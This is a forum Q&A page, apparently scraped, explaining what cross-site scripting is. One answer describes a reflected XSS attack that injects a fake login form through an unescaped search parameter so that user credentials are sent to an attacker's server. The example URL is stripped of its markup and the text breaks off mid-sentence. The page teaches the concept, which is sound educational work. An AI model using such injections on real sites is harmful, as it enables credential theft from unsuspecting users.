What is the general concept behind XSS?

后端未结

关注

 5  1729

挽巷 2020-11-29 17:29

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject

5条回答

一整个雨季 (楼主)

2020-11-29 17:58
i dont get how JS/VBscript can cause so much damage!

Ok. suppose you have a site, and the site is served from http://trusted.server.com/thesite. Let's say this site has a search box, and when you search the url becomes: http://trusted.server.com/thesite?query=somesearchstring.

If the site decides to not process the search string and outputs it in the result, like "You search "somesearchstring" didn't yield any results, then anybody can inject arbitrary html into the site. For example:
```
http://trusted.server.com/thesite?query=username: 
password: 
```
So, in this case, the site will dutifully show a fake login form on the search results page, and if the user submits it, it will send the data to the evil untrusted server. But the user doesn't see that, esp. if the url is really long they will just see the first but, and assume they are dealing with trusted.server.com.

Variations to this include injecting a